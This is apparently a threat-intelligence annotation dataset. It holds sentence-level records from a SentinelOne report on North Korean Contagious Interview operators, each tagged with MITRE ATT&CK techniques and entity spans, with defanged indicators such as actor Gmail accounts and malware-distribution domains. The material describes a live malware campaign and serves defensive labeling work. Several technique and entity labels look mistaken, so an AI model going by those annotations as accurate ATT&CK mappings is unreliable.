in Validin had been published exclusively in apt_lazarus.txt at the time of the search and were queried shortly after their appearance in the file, sometimes within less than an hour.", "sentence_text": "This supports our assessment that the Contagious Interview actors closely monitored apt_lazarus.txt and used Validin to gather further details and contextual information.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Monitored apt_lazarus.txt and used Validin to gather information", "entities": [ { "text": "Contagious Interview", "start": 38, "end": 58, "label": "ThreatActor" }, { "text": "apt_lazarus.txt", "start": 84, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "monitored apt_lazarus.txt", "start": 74, "end": 99, "label": "Action" }, { "text": "used Validin", "start": 104, "end": 116, "label": "Action" }, { "text": "Validin", "start": 109, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "gather further details", "start": 120, "end": 142, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s63-0be482", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "This supports our assessment that the Contagious Interview actors closely monitored apt_lazarus.txt and used Validin to gather further details and contextual information.", "sentence_text": "For example, the account richardkdavis45[@]gmail.com queried Validin for the URL on 12 March 2025 at 22:59:20 UTC, just a few minutes after the exact same URL was first submitted to VirusTotal at 22:54:24 UTC.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "The account richardkdavis45[@]gmail.com queried Validin for the URL shortly after it was submitted to VirusTotal.", "entities": [ { "text": "richardkdavis45[@]gmail.com", "label": "Infrastructure_Indicator", "start": 25, "end": 52 }, { "text": "Validin", "label": "Infrastructure_Indicator", "start": 61, "end": 68 }, { "text": "VirusTotal", "label": "Infrastructure_Indicator", "start": 182, "end": 192 }, { "text": "queried Validin for the URL", "label": "Action", "start": 53, "end": 80 } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s64-a48e94", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "For example, the account richardkdavis45[@]gmail.com queried Validin for the URL on 12 March 2025 at 22:59:20 UTC, just a few minutes after the exact same URL was first submitted to VirusTotal at 22:54:24 UTC.", "sentence_text": "Based on log files, we were able to reconstruct the exact navigation paths of the Contagious Interview threat actors within Validin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s65-563649", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "Based on log files, we were able to reconstruct the exact navigation paths of the Contagious Interview threat actors within Validin.", "sentence_text": "We observed a strong interest in external references that provide attribution information for specific search terms, which Validin displays in the Reputation Factors panel on the search results page.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s66-fd9541", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "We observed a strong interest in external references that provide attribution information for specific search terms, which Validin displays in the Reputation Factors panel on the search results page.", "sentence_text": "Validin Use | Team Collaboration We observed multiple accounts searching for the same terms within a very short time frame, indicating a coordinated and collaborative effort involving multiple individuals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s67-a3b2ba", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "Validin Use | Team Collaboration We observed multiple accounts searching for the same terms within a very short time frame, indicating a coordinated and collaborative effort involving multiple individuals.", "sentence_text": "When investigating patterns of account activity and search behavior using Validin log data, we observed that the jimmr6587[@]gmail.com account was the first to search for the domain webcamfixer[.]online on 12 March 2025 at 22:54:19 UTC, followed by excellentreporter321[@]gmail.com (22:55:17 UTC), rockstar96054[@]gmail.com (22:55:25 UTC), richardkdavis45[@]gmail.com (22:55:43 UTC), and fairdev610[@]gmail.com (22:55:55 UTC).", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Accounts search for domain", "entities": [ { "text": "Validin ", "start": 74, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "jimmr6587[@]gmail.com", "start": 113, "end": 134, "label": "Infrastructure_Indicator" }, { "text": "webcamfixer[.]online", "start": 182, "end": 202, "label": "Infrastructure_Indicator" }, { "text": "excellentreporter321[@]gmail.com", "start": 249, "end": 281, "label": "Infrastructure_Indicator" }, { "text": "rockstar96054[@]gmail.com", "start": 298, "end": 323, "label": "Infrastructure_Indicator" }, { "text": "richardkdavis45[@]gmail.com", "start": 340, "end": 367, "label": "Infrastructure_Indicator" }, { "text": "fairdev610[@]gmail.com", "start": 388, "end": 410, "label": "Infrastructure_Indicator" }, { "text": "search for the domain", "start": 160, "end": 181, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s68-531938", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "When investigating patterns of account activity and search behavior using Validin log data, we observed that the jimmr6587[@]gmail.com account was the first to search for the domain webcamfixer[.]online on 12 March 2025 at 22:54:19 UTC, followed by excellentreporter321[@]gmail.com (22:55:17 UTC), rockstar96054[@]gmail.com (22:55:25 UTC), richardkdavis45[@]gmail.com (22:55:43 UTC), and fairdev610[@]gmail.com (22:55:55 UTC).", "sentence_text": "Our cross-examination of web server log data revealed that the search by jimmr6587[@]gmail.com was followed by requests to Validin from Slack Robots for the same URL generated by the search ( /detail?type=dom&find=webcamfixer[.]online ).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Use Slack Robots to share and access Validin search results", "entities": [ { "text": "jimmr6587[@]gmail.com", "start": 73, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "Validin ", "start": 123, "end": 131, "label": "Infrastructure_Indicator" }, { "text": "/detail?type=dom&find=webcamfixer[.]online", "start": 192, "end": 234, "label": "Infrastructure_Indicator" }, { "text": "Slack Robots", "start": 136, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "requests to Validin ", "start": 111, "end": 131, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s69-a21a95", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "Our cross-examination of web server log data revealed that the search by jimmr6587[@]gmail.com was followed by requests to Validin from Slack Robots for the same URL generated by the search ( /detail?type=dom&find=webcamfixer[.]online ).", "sentence_text": "These Slack Bot requests were followed by requests to the same URL from the IP addresses from which the accounts excellentreporter321[@]gmail.com , rockstar96054[@]gmail.com , richardkdavis45[@]gmail.com , and fairdev610[@]gmail.com had logged in.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Search for a URL by multiple accounts and addresses", "entities": [ { "text": "Slack Bot", "start": 6, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "excellentreporter321[@]gmail.com", "start": 113, "end": 145, "label": "Infrastructure_Indicator" }, { "text": "rockstar96054[@]gmail.com", "start": 148, "end": 173, "label": "Infrastructure_Indicator" }, { "text": "richardkdavis45[@]gmail.com", "start": 176, "end": 203, "label": "Infrastructure_Indicator" }, { "text": "fairdev610[@]gmail.com", "start": 210, "end": 232, "label": "Infrastructure_Indicator" }, { "text": "requests to the same URL", "start": 42, "end": 66, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s70-1008c8", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "These Slack Bot requests were followed by requests to the same URL from the IP addresses from which the accounts excellentreporter321[@]gmail.com , rockstar96054[@]gmail.com , richardkdavis45[@]gmail.com , and fairdev610[@]gmail.com had logged in.", "sentence_text": "The timing of these requests aligns with each account’s respective search for webcamfixer[.]online as recorded in Validin logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s71-2fe39d", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "The timing of these requests aligns with each account’s respective search for webcamfixer[.]online as recorded in Validin logs.", "sentence_text": "This suggests that the individual operating the jimmr6587[@]gmail.com account searched for webcamfixer[.]online in Validin, pasted the resulting URL into Slack, and that the individuals behind the other accounts subsequently clicked on the shared link in quick succession.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Moved data and tools between threat actors", "entities": [ { "text": "jimmr6587[@]gmail.com", "start": 48, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "webcamfixer[.]online", "start": 91, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "Slack", "start": 154, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "clicked on the shared link", "start": 225, "end": 251, "label": "Action" }, { "text": "Validin", "start": 115, "end": 122, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s72-4e8c81", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "This suggests that the individual operating the jimmr6587[@]gmail.com account searched for webcamfixer[.]online in Validin, pasted the resulting URL into Slack, and that the individuals behind the other accounts subsequently clicked on the shared link in quick succession.", "sentence_text": "Validin Use | Limited Infrastructure Changes Despite thoroughly investigating CTI information and identifying artifacts that could be used to discover their infrastructure, we did not observe any systematic or widespread actions by the Contagious Interview threat actors to make their infrastructure more difficult to discover and to protect it against detection and disruption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s73-59db8b", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "Validin Use | Limited Infrastructure Changes Despite thoroughly investigating CTI information and identifying artifacts that could be used to discover their infrastructure, we did not observe any systematic or widespread actions by the Contagious Interview threat actors to make their infrastructure more difficult to discover and to protect it against detection and disruption.", "sentence_text": "We observed only sporadic changes of limited scale that did not significantly reduce the infrastructure’s visibility to defenders and threat researchers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s74-120a7a", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "We observed only sporadic changes of limited scale that did not significantly reduce the infrastructure’s visibility to defenders and threat researchers.", "sentence_text": "This change was not applied to other websites with the same title, such as VidHireHub[.]com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s75-1736ad", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "This change was not applied to other websites with the same title, such as VidHireHub[.]com", "sentence_text": "Many of the Contagious Interview domains that the threat actors searched for in Validin were taken down by their respective registrars shortly after the search activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s76-cf7c37", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "Many of the Contagious Interview domains that the threat actors searched for in Validin were taken down by their respective registrars shortly after the search activity.", "sentence_text": "For example, the A DNS record for the domain careerquestion[.]com was removed just a few hours after the threat actors searched for it in Validin and confirmed its association with their operation.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Domain shut down after searching for it on Validin", "entities": [ { "text": "careerquestion[.]com", "start": 45, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "DNS record ", "start": 19, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "Validin ", "start": 138, "end": 146, "label": "Infrastructure_Indicator" }, { "text": "searched", "start": 119, "end": 127, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s77-6db55d", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "For example, the A DNS record for the domain careerquestion[.]com was removed just a few hours after the threat actors searched for it in Validin and confirmed its association with their operation.", "sentence_text": "We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Deployed new infrastructure", "entities": [ { "text": "Contagious Interview", "start": 64, "end": 84, "label": "Action" }, { "text": "infrastructure deployment", "start": 31, "end": 56, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s78-cf49a9", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.", "sentence_text": "There may be internal limitations, such as a lack of a central authoritative command structure or resource constraints affecting their ability to modify infrastructure rapidly and at scale.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s79-3d6bb3", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "There may be internal limitations, such as a lack of a central authoritative command structure or resource constraints affecting their ability to modify infrastructure rapidly and at scale.", "sentence_text": "These quotas likely incentivize operatives to continually seek new income sources, fostering intense competition within teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s80-c09391", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "These quotas likely incentivize operatives to continually seek new income sources, fostering intense competition within teams.", "sentence_text": "This helps the threat actors avoid acquiring assets already labeled as malicious, which would increase the risk of detection and reduce the effectiveness of their operations once deployed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s81-00419c", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "This helps the threat actors avoid acquiring assets already labeled as malicious, which would increase the risk of detection and reduce the effectiveness of their operations once deployed.", "sentence_text": "To monitor newly acquired infrastructure throughout its lifecycle for any indicators of detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s82-cef41e", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "To monitor newly acquired infrastructure throughout its lifecycle for any indicators of detection.", "sentence_text": "All of these domains were available for purchase at the time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s83-2c2231", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "All of these domains were available for purchase at the time.", "sentence_text": "These names align with the recruitment-related themes typically used in Contagious Interview activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s84-151f29", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "These names align with the recruitment-related themes typically used in Contagious Interview activities.", "sentence_text": "The\ninfo@versusx[.]us\naccount also searched for multiple domains shortly after they were purchased and continued monitoring them for signs of detection after deploying web content.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" }, { "id": "T1610", "name": "Deploy Container" } ], "procedure": "Searched for domains after deploying web content", "entities": [ { "text": "info@versusx[.]us", "start": 4, "end": 21, "label": "Infrastructure_Indicator" }, { "text": "searched for multiple domains", "start": 35, "end": 64, "label": "Action" }, { "text": "deploying web content", "start": 158, "end": 179, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s85-2340dd", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "The\ninfo@versusx[.]us\naccount also searched for multiple domains shortly after they were purchased and continued monitoring them for signs of detection after deploying web content.", "sentence_text": "Additional searches occurred shortly before content was deployed on April 23, 2025, and continued periodically until May 6, 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s86-5317c9", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "Additional searches occurred shortly before content was deployed on April 23, 2025, and continued periodically until May 6, 2025.", "sentence_text": "For example,\napi.release-drivers[.]online\nwas exposing its web root directory, the files it contained, and their associated modification timestamps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s87-bdf109", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "For example,\napi.release-drivers[.]online\nwas exposing its web root directory, the files it contained, and their associated modification timestamps.", "sentence_text": "This included error logs from a Node.js application stored in /home/relefmwz/api.release-drivers[.]online/ , indicating that the threat actors used the username relefmwz .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s88-228f89", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "This included error logs from a Node.js application stored in /home/relefmwz/api.release-drivers[.]online/ , indicating that the threat actors used the username relefmwz .", "sentence_text": "The exposed timestamps provide insight into when the Contagious Interview operators deployed content to the server, allowing us to reconstruct their activity timeline.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1610", "name": "Deploy Container" } ], "procedure": "Deployed content to the server", "entities": [ { "text": "Contagious Interview", "start": 53, "end": 73, "label": "ThreatActor" }, { "text": "deployed content to the server", "start": 84, "end": 114, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s89-dff7c7", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 89, "context_before": "The exposed timestamps provide insight into when the Contagious Interview operators deployed content to the server, allowing us to reconstruct their activity timeline.", "sentence_text": "Further, several newly deployed ClickFix malware distribution servers, such as api.camdriverhelp[.]club and api.drive-release[.]cloud , were exposing ContagiousDrop applications along with the log files they had generated.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Threat actors deployed ClickFix malware distribution servers that hosted ContagiousDrop applications and exposed generated log files.", "entities": [ { "text": "were exposing ContagiousDrop applications along with the log files they had generated.", "start": 136, "end": 222, "label": "Action" }, { "text": "newly deployed ClickFix malware distribution servers", "start": 17, "end": 69, "label": "Action" }, { "text": "api.camdriverhelp[.]club and api.drive-release[.]cloud", "start": 79, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "ContagiousDrop ", "start": 150, "end": 165, "label": "MalwareTool" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s90-399577", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "Further, several newly deployed ClickFix malware distribution servers, such as api.camdriverhelp[.]club and api.drive-release[.]cloud , were exposing ContagiousDrop applications along with the log files they had generated.", "sentence_text": "These files contain information on affected individuals, allowing us to gain valuable insights into the victimology of the campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s91-e26dcc", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "These files contain information on affected individuals, allowing us to gain valuable insights into the victimology of the campaigns.", "sentence_text": "ContagiousDrop Applications\nThe ContagiousDrop applications, typically implemented in app.js files , are deployed on ClickFix malware distribution servers such as api.drive-release[.]cloud .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1610", "name": "Deploy Container" }, { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "Malware apps deployed on ClickFix malware distribution servers", "entities": [ { "text": "ContagiousDrop applications", "start": 32, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "app.js", "start": 86, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "ClickFix ", "start": 117, "end": 126, "label": "MalwareTool" }, { "text": "api.drive-release[.]cloud", "start": 163, "end": 188, "label": "Infrastructure_Indicator" }, { "text": "deployed on ClickFix malware distribution servers", "start": 105, "end": 154, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s92-7a4e13", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 92, "context_before": "ContagiousDrop Applications\nThe ContagiousDrop applications, typically implemented in app.js files , are deployed on ClickFix malware distribution servers such as api.drive-release[.]cloud .", "sentence_text": "These applications run servers that listen on configured ports to handle incoming HTTP GET and POST requests, executing different functions based on the specific request path.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Run servers to handle HTTP requests and execute functions based on request path", "entities": [ { "text": "run servers that listen on configured ports", "start": 19, "end": 62, "label": "Action" }, { "text": "applications ", "start": 6, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "handle incoming HTTP GET and POST requests", "start": 66, "end": 108, "label": "Action" }, { "text": "executing different functions", "start": 110, "end": 139, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s93-5cb787", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "These applications run servers that listen on configured ports to handle incoming HTTP GET and POST requests, executing different functions based on the specific request path.", "sentence_text": "The ContagiousDrop applications deliver malware disguised as software updates or essential utilities.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1610", "name": "Deploy Container" } ], "procedure": "Deliver malware disguised as legitimate software", "entities": [ { "text": "ContagiousDrop ", "start": 4, "end": 19, "label": "MalwareTool" }, { "text": "deliver malware disguised as software updates or essential utilities", "start": 32, "end": 100, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s94-23f8ef", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "The ContagiousDrop applications deliver malware disguised as software updates or essential utilities.", "sentence_text": "In addition to delivering malware, the ContagiousDrop applications feature an integrated email notification system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s95-86dc28", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 95, "context_before": "In addition to delivering malware, the ContagiousDrop applications feature an integrated email notification system.", "sentence_text": "These notifications, sent from a configured email address such as designedcuratedamy58[@]gmail.com , provide the Contagious Interview threat actors with insights into victim engagement and interaction patterns and are delivered to their configured recipient addresses.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Use email notifications to monitor victim engagement and interaction patterns", "entities": [ { "text": "designedcuratedamy58[@]gmail.com", "start": 66, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "Contagious Interview", "start": 113, "end": 133, "label": "ThreatActor" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s96-8c22d3", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 96, "context_before": "These notifications, sent from a configured email address such as designedcuratedamy58[@]gmail.com , provide the Contagious Interview threat actors with insights into victim engagement and interaction patterns and are delivered to their configured recipient addresses.", "sentence_text": "For example, an email is triggered when an affected individual starts a fake skill assessment or executes a curl command to download a file from the ClickFix malware distribution server.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute a command-line instruction to download a file from a remote server.", "entities": [ { "text": "executes a curl command to download a file", "start": 97, "end": 139, "label": "Action" }, { "text": "ClickFix malware distribution server", "start": 149, "end": 185, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s97-22a0bb", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 97, "context_before": "For example, an email is triggered when an affected individual starts a fake skill assessment or executes a curl command to download a file from the ClickFix malware distribution server.", "sentence_text": "Malware download initiations are logged in files such as client_ips_start.json and client_ips_mac_start.json , which capture operating system–specific payload delivery.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1119", "name": "Automated Collection" } ], "procedure": "Capture OS specific payload delivery", "entities": [ { "text": "Malware download initiations are logged in files", "start": 0, "end": 48, "label": "Action" }, { "text": "client_ips_start.json", "start": 57, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "client_ips_mac_start.json", "start": 83, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "capture operating system–specific payload delivery", "start": 117, "end": 167, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s98-a1e3ee", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 98, "context_before": "Malware download initiations are logged in files such as client_ips_start.json and client_ips_mac_start.json , which capture operating system–specific payload delivery.", "sentence_text": "ContagiousDrop | Victimology Based on ContagiousDrop log files we retrieved, we identified over 230 individuals who engaged with Contagious Interview lures between mid-January and the end of March 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s99-366b77", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 99, "context_before": "ContagiousDrop | Victimology Based on ContagiousDrop log files we retrieved, we identified over 230 individuals who engaged with Contagious Interview lures between mid-January and the end of March 2025.", "sentence_text": "This figure is based on log files from only a few Contagious Interview servers; therefore, the actual number of affected individuals is likely significantly higher.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s100-de6699", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 100, "context_before": "This figure is based on log files from only a few Contagious Interview servers; therefore, the actual number of affected individuals is likely significantly higher.", "sentence_text": "Their engagement spanned multiple stages of the attack, including completing fake assessment tests and progressing to the infection phase via the ClickFix technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s101-d363eb", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 101, "context_before": "Their engagement spanned multiple stages of the attack, including completing fake assessment tests and progressing to the infection phase via the ClickFix technique.", "sentence_text": "In addition to entries related to victim activity, the ContagiousDrop logs also contain records likely generated during testing of lure deployment and campaign infrastructure by the Contagious Interview threat actors themselves.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s102-9f6061", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 102, "context_before": "In addition to entries related to victim activity, the ContagiousDrop logs also contain records likely generated during testing of lure deployment and campaign infrastructure by the Contagious Interview threat actors themselves.", "sentence_text": "They used email addresses and persona names we have associated with them, such as awesomium430[@]gmail.com (found in ContagiousDrop code) and Richard Davis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s103-a67c14", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 103, "context_before": "They used email addresses and persona names we have associated with them, such as awesomium430[@]gmail.com (found in ContagiousDrop code) and Richard Davis.", "sentence_text": "Lazarus.\nConclusions\nNorth Korean threat groups actively examine CTI information to identify threats to their operations and improve the resilience and effectiveness of their campaigns, depending on their operational priorities.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1681", "name": "Search Threat Vendor Data" } ], "procedure": "Examine CTI information about themselves", "entities": [ { "text": "North Korean threat groups", "start": 21, "end": 47, "label": "ThreatActor" }, { "text": "examine CTI information", "start": 57, "end": 80, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s104-387fcd", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 104, "context_before": "Lazarus.\nConclusions\nNorth Korean threat groups actively examine CTI information to identify threats to their operations and improve the resilience and effectiveness of their campaigns, depending on their operational priorities.", "sentence_text": "In addition to the actors behind the Contagious Interview campaign cluster, SentinelLABS has also observed other North Korean groups demonstrating interest in threat intelligence prior to the activities discussed in this post.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1596", "name": "Search Open Technical Databases" } ], "procedure": "Interest in threat intelligence", "entities": [ { "text": "Contagious Interview", "start": 37, "end": 57, "label": "ThreatActor" }, { "text": "North Korean groups", "start": 113, "end": 132, "label": "ThreatActor" }, { "text": "interest in threat intelligence", "start": 147, "end": 178, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s105-46632c", "source": "sentinel", "doc_id": 